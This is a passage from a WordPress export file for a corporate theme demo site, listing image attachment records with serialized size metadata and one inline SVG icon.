		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:26:"2020/09/service-box4.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:26:"service-box4-1-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"service-box4-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"service-box4-1-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"service-box4-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"service-box4-1-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-services/service-box5/</link>
		<pubDate>Mon, 14 Sep 2020 07:43:38 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box5.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>906</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:43:38]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:43:38]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box5.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/service-box5.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:26:"2020/09/service-box5.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:26:"service-box5-1-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"service-box5-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"service-box5-1-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"service-box5-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"service-box5-1-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box6</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-services/service-box6/</link>
		<pubDate>Mon, 14 Sep 2020 07:43:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box6.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>907</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:43:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:43:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box6]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box6.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/service-box6.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:26:"2020/09/service-box6.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:26:"service-box6-1-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"service-box6-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"service-box6-1-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"service-box6-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"service-box6-1-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-service-detail</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-services/marketing-research/bg1-service-detail/</link>
		<pubDate>Wed, 16 Sep 2020 10:07:33 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-service-detail.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>935</wp:post_id>
		<wp:post_date><![CDATA[2020-09-16 10:07:33]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-16 10:07:33]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-service-detail]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>898</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-service-detail.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-service-detail.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:204;s:4:"file";s:32:"2020/09/bg1-service-detail.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:31:"bg1-service-detail-1-300x70.jpg";s:5:"width";i:300;s:6:"height";i:70;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:32:"bg1-service-detail-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"bg1-service-detail-1-768x180.jpg";s:5:"width";i:768;s:6:"height";i:180;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:32:"bg1-service-detail-1-600x204.jpg";s:5:"width";i:600;s:6:"height";i:204;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:32:"bg1-service-detail-1-600x204.jpg";s:5:"width";i:600;s:6:"height";i:204;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-service-detail2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-services/organizational-audit/bg1-service-detail2/</link>
		<pubDate>Thu, 17 Sep 2020 04:10:20 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-service-detail2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>961</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 04:10:20]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 04:10:20]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-service-detail2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>959</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-service-detail2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-service-detail2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1174;s:6:"height";i:540;s:4:"file";s:33:"2020/09/bg1-service-detail2.jpg";s:5:"sizes";a:6:{s:6:"medium";a:4:{s:4:"file";s:33:"bg1-service-detail2-1-300x138.jpg";s:5:"width";i:300;s:6:"height";i:138;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"bg1-service-detail2-1-1024x471.jpg";s:5:"width";i:1024;s:6:"height";i:471;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:33:"bg1-service-detail2-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"bg1-service-detail2-1-768x353.jpg";s:5:"width";i:768;s:6:"height";i:353;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:33:"bg1-service-detail2-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:33:"bg1-service-detail2-1-600x540.jpg";s:5:"width";i:600;s:6:"height";i:540;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg2-service-detail2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-services/organizational-audit/bg2-service-detail2/</link>
		<pubDate>Thu, 17 Sep 2020 07:35:50 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg2-service-detail2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>970</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 07:35:50]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 07:35:50]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg2-service-detail2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>959</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg2-service-detail2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg2-service-detail2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:660;s:4:"file";s:33:"2020/09/bg2-service-detail2.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:33:"bg2-service-detail2-1-300x103.jpg";s:5:"width";i:300;s:6:"height";i:103;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"bg2-service-detail2-1-1024x352.jpg";s:5:"width";i:1024;s:6:"height";i:352;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:33:"bg2-service-detail2-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"bg2-service-detail2-1-768x264.jpg";s:5:"width";i:768;s:6:"height";i:264;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:34:"bg2-service-detail2-1-1536x528.jpg";s:5:"width";i:1536;s:6:"height";i:528;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:33:"bg2-service-detail2-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:33:"bg2-service-detail2-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:34:"bg2-service-detail2-1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:34:"bg2-service-detail2-1-1200x660.jpg";s:5:"width";i:1200;s:6:"height";i:660;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>energy</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-services/business-consulting/energy/</link>
		<pubDate>Thu, 17 Sep 2020 08:34:26 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/energy.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>980</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 08:34:26]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 08:34:26]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[energy]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>977</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/energy.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/energy.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 -9 512.00092 512"><path d="m243.273438 147.371094c-4.140626 0-7.5 3.359375-7.5 7.5v74.769531c0 4.144531 3.359374 7.5 7.5 7.5 4.144531 0 7.5-3.355469 7.5-7.5v-74.769531c0-4.140625-3.359376-7.5-7.5-7.5zm0 0"></path><path d="m152.441406 383.160156 64.75-37.386718c3.589844-2.070313 4.816406-6.65625 2.746094-10.242188s-6.660156-4.816406-10.242188-2.746094l-64.753906 37.386719c-3.585937 2.070313-4.816406 6.65625-2.746094 10.242187 2.082032 3.605469 6.675782 4.808594 10.246094 2.746094zm0 0"></path><path d="m383.484375 349.453125-64.753906-37.386719c-3.589844-2.070312-8.175781-.839844-10.246094 2.746094s-.839844 8.171875 2.746094 10.242188l64.753906 37.386718c1.179687.679688 2.46875 1.003906 3.742187 1.003906 2.589844 0 5.113282-1.34375 6.5-3.75 2.070313-3.585937.84375-8.171874-2.742187-10.242187zm0 0"></path><path d="m63.074219 331.53125c.371093 0 .75-.027344 1.128906-.085938 4.097656-.617187 6.914063-4.4375 6.292969-8.535156-1.378906-9.132812-2.078125-18.472656-2.078125-27.757812 0-71.730469 41.214843-135.011719 103.09375-165.410156 3.71875-1.828126 5.253906-6.320313 3.425781-10.039063-1.824219-3.714844-6.316406-5.25-10.035156-3.425781-67.039063 32.929687-111.484375 101.449218-111.484375 178.875 0 10.035156.757812 20.125 2.25 30 .558593 3.714844 3.757812 6.378906 7.40625 6.378906zm0 0"></path><path d="m170.335938 166.796875c-43.941407 28.21875-70.171876 76.203125-70.171876 128.355469 0 3.332031.117188 6.808594.355469 10.34375.273438 4.101562 3.8125 7.257812 7.980469 6.984375 4.132812-.277344 7.261719-3.855469 6.984375-7.984375-.214844-3.203125-.324219-6.347656-.324219-9.34375 0-47.023438 23.65625-90.289063 63.28125-115.738282 3.484375-2.238281 4.496094-6.875 2.257813-10.359374-2.238281-3.488282-6.878907-4.496094-10.363281-2.257813zm0 0"></path><path d="m320.199219 123.789062c8.589843 3.398438 17.015625 7.492188 25.039062 12.160157 62.003907 36.074219 95.972657 103.523437 91.128907 172.296875-.292969 4.128906 2.820312 7.714844 6.953124 8.007812.179688.011719.355469.015625.535157.015625 3.898437 0 7.195312-3.019531 7.472656-6.972656 5.25-74.5-31.621094-147.375-98.546875-186.3125-8.671875-5.042969-17.773438-9.464844-27.0625-13.144531-3.851562-1.523438-8.210938.363281-9.734375 4.214844-1.523437 3.851562.363281 8.207031 4.214844 9.734374zm0 0"></path><path d="m313.492188 171.933594c2.867187 1.421875 5.640624 2.90625 8.234374 4.417968 40.648438 23.648438 66.148438 65.855469 68.21875 112.902344.175782 4.023438 3.496094 7.167969 7.484376 7.167969.113281 0 .226562 0 .335937-.007813 4.140625-.179687 7.34375-3.683593 7.164063-7.820312-2.296876-52.171875-30.578126-98.976562-75.660157-125.207031-2.882812-1.675781-5.953125-3.324219-9.117187-4.890625-3.710938-1.839844-8.210938-.320313-10.050782 3.386718-1.839843 3.710938-.320312 8.210938 3.390626 10.050782zm0 0"></path><path d="m371.164062 436.148438c-7.078124 5.9375-14.6875 11.398437-22.609374 16.234374-61.472657 37.511719-136.953126 35-194.902344-1.839843-3.492188-2.222657-8.132813-1.191407-10.351563 2.304687-2.222656 3.496094-1.191406 8.128906 2.304688 10.351563 63.878906 40.613281 145.515625 41.800781 210.761719 1.984375 8.5625-5.222656 16.78125-11.125 24.4375-17.542969 3.171874-2.664063 3.585937-7.390625.925781-10.566406-2.660157-3.171875-7.390625-3.589844-10.566407-.925781zm0 0"></path><path d="m332.015625 425.285156c2.855469-1.738281 5.761719-3.65625 8.648437-5.695312 3.382813-2.386719 4.1875-7.066406 1.796876-10.449219-2.390626-3.382813-7.066407-4.1875-10.453126-1.800781-2.609374 1.847656-5.234374 3.574218-7.804687 5.140625-40.136719 24.5-89.390625 26.84375-131.757813 6.273437-3.726562-1.808594-8.214843-.253906-10.023437 3.472656-1.808594 3.722657-.253906 8.210938 3.472656 10.019532 46.933594 22.789062 101.5625 20.230468 146.121094-6.960938zm0 0"></path><path d="m506.246094 418.738281-153.742188-142.207031c-1.605468-1.488281-3.773437-2.199219-5.953125-1.945312l-45.195312 5.210937c-1.582031-5-3.917969-9.667969-6.863281-13.875l-6.4375-176.585937c-.148438-4.136719-3.628907-7.382813-7.765626-7.21875-4.140624.148437-7.371093 3.628906-7.222656 7.765624l5.882813 161.445313c-15.636719-9.433594-35.507813-9.710937-51.355469-.75l-24.09375-32.464844 45.523438-200.886719c.296874-1.3125 1.445312-2.226562 2.789062-2.226562h15.765625c1.546875 0 2.800781 1.210938 2.859375 2.753906l1.707031 46.886719c.152344 4.140625 3.652344 7.359375 7.769531 7.21875 4.136719-.148437 7.371094-3.625 7.222657-7.765625l-1.710938-46.886719c-.351562-9.648437-8.191406-17.207031-17.847656-17.207031h-15.765625c-8.398438 0-15.5625 5.722656-17.414062 13.910156l-46.285157 204.25c-.484375 2.132813-.011719 4.371094 1.289063 6.125l26.355468 35.511719c-7.160156 7.457031-12.089843 17.070313-13.6875 27.757813l-193.675781 121.4375c-8.183593 5.128906-10.808593 15.699218-5.980469 24.058593l7.882813 13.65625c3.273437 5.664063 9.167969 8.941407 15.40625 8.941407 1.773437 0 3.574219-.265626 5.351563-.816407l45.554687-14.128906c3.957031-1.226563 6.171875-5.429687 4.941406-9.382813-1.226562-3.957031-5.425781-6.167968-9.382812-4.941406l-45.558594 14.128906c-1.28125.398438-2.652344-.136718-3.324219-1.300781l-7.882812-13.65625c-.773438-1.335937-.351563-3.027343.957031-3.851562l186.105469-116.6875c3.703125 18.878906 17.835937 34.054687 36.125 39.28125l-15.246094 35.195312-123.925781 38.4375c-3.957031 1.226563-6.167969 5.425781-4.941407 9.382813 1.226563 3.957031 5.429688 6.167968 9.386719 4.941406l127.21875-39.457031c2.085938-.648438 3.789063-2.175781 4.660157-4.183594l18.359374-42.386719c1.921876-.054687 3.816407-.214844 5.679688-.476562l218.09375 115.535156c2.683594 1.421875 5.558594 2.101562 8.390625 2.101562 6.167969 0 12.125-3.21875 15.433594-8.949218l7.886719-13.65625c4.195312-7.273438 2.824218-16.335938-3.339844-22.039063zm-253.636719-87.476562c-20.011719 0-36.109375-16.453125-36.109375-36.109375 0-19.941406 16.238281-36.105469 36.109375-36.105469 19.875 0 36.105469 16.195313 36.105469 36.105469 0 19.675781-15.972656 36.109375-36.105469 36.109375zm243.984375 102.015625-7.882812 13.65625c-.769532 1.335937-2.441407 1.820312-3.8125 1.09375l-205.929688-109.089844c15.308594-9.246094 24.945312-26.113281 24.742188-44.3125l41.136718-4.746094 151.214844 139.871094c.984375.914062 1.207031 2.363281.53125 3.527344zm0 0"></path></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-service-detail3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-services/business-consulting/bg1-service-detail3/</link>
		<pubDate>Thu, 17 Sep 2020 08:48:47 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-service-detail3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>982</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 08:48:47]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 08:48:47]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-service-detail3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>977</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-service-detail3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-service-detail3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:420;s:4:"file";s:33:"2020/09/bg1-service-detail3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:33:"bg1-service-detail3-1-300x145.jpg";s:5:"width";i:300;s:6:"height";i:145;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:33:"bg1-service-detail3-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"bg1-service-detail3-1-768x371.jpg";s:5:"width";i:768;s:6:"height";i:371;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:33:"bg1-service-detail3-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:33:"bg1-service-detail3-1-600x420.jpg";s:5:"width";i:600;s:6:"height";i:420;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s: